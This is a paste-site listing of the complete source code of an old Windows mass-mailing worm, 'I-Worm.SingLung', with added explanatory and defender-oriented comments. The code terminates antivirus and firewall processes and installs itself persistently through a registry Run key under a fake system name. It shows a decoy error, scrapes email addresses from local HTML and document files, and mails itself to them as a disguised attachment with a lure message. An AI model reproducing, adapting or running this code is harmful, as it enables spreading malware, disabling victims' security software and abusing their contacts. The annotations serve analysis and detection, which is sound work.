FlyFar

I-Worm.SingLung - Source Code

Jul 13th, 2023
  1. /*
  2. Name : I-Worm.SingLung
  3. Author : PetiK
  4. Date : January 23rd 2002 - January 26th 2002
  5. Language : C++/Win32asm
  6.  
  7. Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
  8. */
  9.  
  10. #include <stdio.h>
  11. #include <windows.h>
  12. #include <mapi.h>
  13. #include <tlhelp32.h>
  14. #pragma argused
  15. #pragma inline
  16.  
  17.  
  18. char    filename[100],sysdir[100],sysdr[100],winhtm[100];   // own image path, system dir, expected install path, Windows dir (all filled in WinMain)
  19. LPSTR   Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",   // autorun key, opened under HKEY_LOCAL_MACHINE in WinMain
  20.     SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";   // shell-folder paths, opened under HKEY_USERS in WinMain
  21. int i;
  22. HANDLE  fd,lSnapshot,myproc;   // lSnapshot/myproc are used by StopAV
  23. BOOL    rProcessFound;
  24. BYTE    desktop[50],favoris[50],personal[50],cache[50];   // receive the "Desktop", "Favorites", "Personal" and "Cache" registry values
  25. DWORD   sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
  26.     sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
  27. DWORD   type=REG_SZ;
  28. FILE    *stopv;   // HTML file written by FeedBack
  29.  
  30. LHANDLE session;
  31. MapiMessage mess;   // Simple MAPI message and originator, filled by sendmail
  32. MapiRecipDesc from;
  33. HINSTANCE hMAPI;   // handle of MAPI32.DLL, loaded in WinMain
  34.  
  35. HKEY        hReg;
  36. PROCESSENTRY32  uProcess;
  37. SYSTEMTIME  systime;
  38. WIN32_FIND_DATA ffile;
  39. HDC     dc;
  40.  
  41. void Welcome();
  42. void StopAV(char *);
  43. void FindFile(char *,char *);
  44. void GetMail(char *,char *);
  45. void sendmail(char *);
  46. void FeedBack();
  47.  
  48. //ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
  49. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);   // set at run time from GetProcAddress(hMAPI,"MAPISendMail")
  50.  
  51.  
  52. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  53. {
       // Entry point of the sample. Order of operations as written below:
       //  1. StopAV() is called for a fixed list of security-product process names.
       //  2. The running image path is compared with <system dir>\MSGDI32.EXE.
       //     - different path: only the decoy dialog (Welcome) is shown;
       //     - same path: MAPI32.DLL is loaded, shell-folder paths are read from
       //       the registry, the code waits until InternetGetConnectedState
       //       returns 1, then FindFile() walks several folders and FeedBack() runs.
       //  3. On both paths the image is copied to <system dir>\MsGDI32.exe and
       //     registered under HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
  54.     /*
  55.     // Worm in RegisterServiceProcess
  56.     HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
  57.     if(kern32) {
  58.         (FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
  59.         if(RegSerPro)
  60.         RegSerPro(NULL,1);
  61.     }   */
  62.  
       // Security-software tampering: each call terminates every process whose
       // image name contains the given string (see StopAV). For defenders, a
       // burst of terminations against these image names is a tamper signal.
  63. // Fuck some AntiVirus hahahaha
  64. StopAV("AVP32.EXE");        // AVP
  65. StopAV("AVPCC.EXE");        // AVP
  66. StopAV("AVPM.EXE");     // AVP
  67. StopAV("WFINDV32.EXE");     // Dr. Solomon
  68. StopAV("F-AGNT95.EXE");     // F-Secure
  69. StopAV("NAVAPW32.EXE");     // Norton Antivirus
  70. StopAV("NAVW32.EXE");       // Norton Antivirus
  71. StopAV("NMAIN.EXE");        // Norton Antivirus
  72. StopAV("PAVSCHED.EXE");     // Panda AntiVirus
  73. StopAV("ZONEALARM.EXE");    // ZoneAlarm
  74.  
       // filename = path of the running image; sysdr = <system dir>\MSGDI32.EXE.
  75. GetModuleFileName(hInst,filename,100);
  76. GetSystemDirectory((char *)sysdir,100);
  77.  
  78. strcpy(sysdr,sysdir);
  79. strcat(sysdr,"\\MSGDI32.EXE");
       // Not running from the installed location: show the decoy error only.
  80. if((lstrcmp(filename,sysdr))!=0) {
  81.     Welcome();
  82.     }
  83. else
  84.     {
       // Running from the installed location: resolve MAPISendMail, then read
       // the Desktop/Favorites/Personal/Cache folder paths from
       // HKEY_USERS\.DEFAULT\...\Explorer\Shell Folders and the Windows directory.
       // None of the return values below are checked.
  85.     hMAPI=LoadLibrary("MAPI32.DLL");
  86.     (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  87.     RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  88.     RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  89.     RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  90.     RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  91.     RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
  92.     RegCloseKey(hReg);
  93.     GetWindowsDirectory((char *)winhtm,100);
  94.  
       // Inline asm: LoadLibrary("WININET.DLL"), GetProcAddress for
       // "InternetGetConnectedState", then call it in a loop (label verf) until
       // it returns 1; the library is freed afterwards. If either lookup fails
       // the loop is skipped.
  95. _asm
  96. {
  97. call    @wininet
  98. db  "WININET.DLL",0
  99. @wininet:
  100. call    LoadLibrary
  101. test    eax,eax
  102. jz  end_asm
  103. mov ebp,eax
  104. call    @inetconnect
  105. db  "InternetGetConnectedState",0
  106. @inetconnect:
  107. push    ebp
  108. call    GetProcAddress
  109. test    eax,eax
  110. jz  end_wininet
  111. mov edi,eax
  112. verf:
  113. push    0
  114. push    Tmp
  115. call    edi
  116. dec eax
  117. jnz verf
  118.  
  119. end_wininet:
  120. push    ebp
  121. call    FreeLibrary
  122. end_asm:
  123. jmp end_all_asm
  124.  
  125. Tmp dd 0
  126.  
  127. end_all_asm:
  128. }
  129.  
       // Address harvesting and mailing: each call scans one folder with one
       // file pattern (see FindFile); FeedBack() is the date-triggered payload.
  130.     FindFile(desktop,"*.htm");
  131.     FindFile(favoris,"*.ht*");
  132.     FindFile(personal,"*.ht*");
  133.     FindFile(personal,"*.doc");
  134.     FindFile(winhtm,".ht*");
  135.     FindFile(cache,".ht*");
  136.     FreeLibrary(hMAPI);
  137.     FeedBack();
  138.     }
  139.  
       // Persistence, executed on both branches: copy the running image to
       // <system dir>\MsGDI32.exe (overwriting, bFailIfExists=FALSE) and point the
       // HKLM Run value "Microsoft GDI 32 bits" at it. Host indicators visible
       // here: that file name in the system directory and that Run value name.
  140. strcat(sysdir,"\\MsGDI32.exe");
  141. CopyFile(filename,sysdir,FALSE);
  142. RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
  143. RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
  144. RegCloseKey(hReg);
  145.  
  146. }
  147.  
  148. void Welcome()
  149. {
       // Decoy dialog, called from WinMain when the image is not running from
       // <system dir>\MSGDI32.EXE. It shows an error-styled MessageBox whose
       // title and text are built with wsprintf from the part of the module
       // path that follows the last backslash, claiming the file is damaged.
       // Uses the global loop counter i and the global filename.
  150. register char fileWel[100],messWel[25],titWel[25];
  151. strcpy(fileWel,filename);
  152. fileWel[0]=0;
       // Walk back from the end of the path to the last '\\' (or to index 0).
  153. for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
  154. wsprintf(titWel,"Error - %s",fileWel+i+1);
  155. wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
  156. MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
  157. }
  158.  
  159.  
  160. void StopAV(char *antivirus)
  161. {
       // Terminates every running process whose executable name contains the
       // string `antivirus` (substring match with strstr, as written).
       // Processes are enumerated through a Toolhelp32 snapshot; each match is
       // opened with PROCESS_ALL_ACCESS and passed to TerminateProcess.
       // The result stored in `term` is never read.
       // Defender note: OpenProcess with full access followed by
       // TerminateProcess against security-product images is the behaviour to
       // alert on here.
  162. register BOOL term;
  163. lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  164. uProcess.dwSize=sizeof(uProcess);
  165. rProcessFound=Process32First(lSnapshot,&uProcess);
  166. while(rProcessFound) {
  167.     if(strstr(uProcess.szExeFile,antivirus)!=NULL) {    // image name contains the requested string
  168.         myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
  169.         if(myproc!=NULL) {
  170.             term=TerminateProcess(myproc,0);
  171.         }
  172.         CloseHandle(myproc);
  173.     }
  174.     rProcessFound=Process32Next(lSnapshot,&uProcess);
  175. }
  176. CloseHandle(lSnapshot);
  177. }
  178.  
  179.  
  180. void FindFile(char *folder, char *ext)
  181. {
       // Scans one folder for files matching the pattern `ext`.
       //   folder - directory made current with SetCurrentDirectory
       //   ext    - pattern handed to FindFirstFile (relative to that directory)
       // For every match: the file attributes are set to ARCHIVE, GetMail()
       // extracts at most one address from the file, and a non-empty result is
       // logged to "singlung.txt" (section "EMail found", key = address,
       // value "send") before sendmail() is called for it.
       // Defender note: singlung.txt is a host artefact listing the addresses
       // that were mailed. NOTE(review): the name is given without a path, so
       // where the file ends up depends on how WritePrivateProfileString
       // resolves bare names - verify on the affected system.
  182. register bool abc=TRUE;
  183. register HANDLE hFile;
  184. char mail[128];
  185. SetCurrentDirectory(folder);
  186. hFile=FindFirstFile(ext,&ffile);
  187. if(hFile!=INVALID_HANDLE_VALUE) {
  188.     while(abc) {
  189.     SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
  190.     GetMail(ffile.cFileName,mail);
  191.     if(strlen(mail)>0) {
  192.     WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
  193.     sendmail(mail);
  194.     }
  195.     abc=FindNextFile(hFile,&ffile);
  196.     }
  197. }
  198.  
  199. }
  200.  
  201. void GetMail(char *namefile, char *mail)
  202. {
       // Extracts the address that follows the first "mailto:" in a file.
       //   namefile - file to read (opened read-only and memory-mapped)
       //   mail     - caller buffer that receives the address; set to the empty
       //              string when nothing usable is found. At most 127
       //              characters plus the terminator are written.
       // Only the first case-insensitive "mailto:" is examined. Characters are
       // copied until a double quote (34) or single quote (39), skipping
       // spaces, and the result is kept only if it contains '@'.
       // The local i declared below shadows the global int i.
  203. HANDLE  hf,hf2;
  204. char    *mapped;
  205. DWORD   size,i,k;
  206. BOOL    test=FALSE,valid=FALSE;
  207. mail[0]=0;
  208.  
  209. hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
  210. if(hf==INVALID_HANDLE_VALUE)
  211.     return;
  212. size=GetFileSize(hf,NULL);
  213. if(!size)
  214.     return;
  215. if(size<8)
  216.     return;
       // The scan limit used below is the file size minus 100.
  217. size-=100;
  218.  
  219. hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
  220. if(!hf2) {
  221.     CloseHandle(hf);
  222.     return;
  223.     }
  224.  
  225. mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
  226. if(!mapped) {
  227.     CloseHandle(hf2);
  228.     CloseHandle(hf);
  229.     return;
  230.     }
  231.  
       // Linear scan; `test` becomes TRUE at the first "mailto:" and ends the loop.
  232. i=0;
  233. while(i<size && !test) {
  234. if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
  235.     test=TRUE;
  236.     i+=strlen("mailto:");
  237.     k=0;
  238.     while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
  239.         if(mapped[i]!=' ') {
  240.             mail[k]=mapped[i];
  241.             k++;
  242.             if(mapped[i]=='@')
  243.                 valid=TRUE;
  244.         }
  245.         i++;
  246.     }
  247.     mail[k]=0;
  248.     } else
  249.     i++;
  250. }
  251.  
       // Discard the candidate when no '@' was seen.
  252. if(!valid)
  253.     mail[0]=0;
  254. UnmapViewOfFile(mapped);
  255. CloseHandle(hf2);
  256. CloseHandle(hf);
  257. return;
  258. }
  259.  
  260. void sendmail(char *tos)
  261. {
       // Sends one message through Simple MAPI using the mSendMail pointer
       // resolved in WinMain.
       //   tos - address used both as recipient name and recipient address
       // The message has a fixed subject ("Secret for you...") and fixed body
       // text, one MAPI_TO recipient, and one attachment: the running image
       // (global filename) presented under the name "My_Work.exe".
       // The MAPISendMail return value is not checked.
       // Defender note: the subject line and the attachment name are the
       // mail-gateway indicators visible in this listing.
  262. memset(&mess,0,sizeof(MapiMessage));
  263. memset(&from,0,sizeof(MapiRecipDesc));
  264.  
  265. from.lpszName=NULL;
  266. from.ulRecipClass=MAPI_ORIG;
  267. mess.lpszSubject="Secret for you...";
  268. mess.lpszNoteText="Hi Friend,\n\n"
  269.         "I send you my last work.\n"
  270.         "Mail me if you have some suggests.\n\n"
  271.         "   See you soon. Best Regards.";
  272.  
  273. mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
  274.     if(!mess.lpRecips)
  275.     return;
  276. memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
  277. mess.lpRecips->lpszName=tos;
  278. mess.lpRecips->lpszAddress=tos;
  279. mess.lpRecips->ulRecipClass=MAPI_TO;
  280. mess.nRecipCount=1;
  281.  
  282. mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  283.     if(!mess.lpFiles)
  284.     return;
  285. memset(mess.lpFiles,0,sizeof(MapiFileDesc));
  286. mess.lpFiles->lpszPathName=filename;
  287. mess.lpFiles->lpszFileName="My_Work.exe";
  288. mess.nFileCount=1;
  289.  
  290. mess.lpOriginator=&from;
  291.  
  292. mSendMail(0,0,&mess,0,0);
  293.  
  294. free(mess.lpRecips);
  295. free(mess.lpFiles);
  296. }
  297.  
  298.  
  299. void FeedBack()
  300. {
       // Date-triggered payload, called from WinMain after the mailing pass.
       // The trigger is the day of the month (systime.wDay) read with
       // GetSystemTime:
       //   day 7  - shows a message box;
       //   day 11 - draws a line of text at (300,300) on the screen DC;
       //   day 28 - writes "StopIntifada.htm" (relative path, so in the current
       //            directory) and opens it maximized through ShellExecute.
       // Other days do nothing. The fopen result is not checked.
       // Defender note: StopIntifada.htm is a dropped-file indicator.
  301. GetSystemTime(&systime);
  302. switch(systime.wDay) {
  303. case 7:
  304.     MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
  305.             "With this, you stop the life of women and children.",
  306.             "Message to USA",MB_OK|MB_ICONHAND);
  307.     break;
  308.  
  309. case 11:
  310.     dc=GetDC(NULL);
  311.     if(dc)
  312.     {
  313.     TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
  314.     }
  315.     ReleaseDC(NULL,dc);
  316.     break;
  317.  
  318. case 28:
  319.     stopv=fopen("StopIntifada.htm","w");
  320.     fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
  321.     fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
  322.     fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
  323.     fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
  324.     fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
  325.     fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
  326.     fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
  327.     fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
  328.     fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
  329.     fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
  330.     fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
  331.     fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
  332.     fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
  333.     fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
  334.     fprintf(stopv,"</body></html>");
  335.     fclose(stopv);
  336.     ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
  337.    
  338.     break;
  339. }
  340. }
Tags: internet worm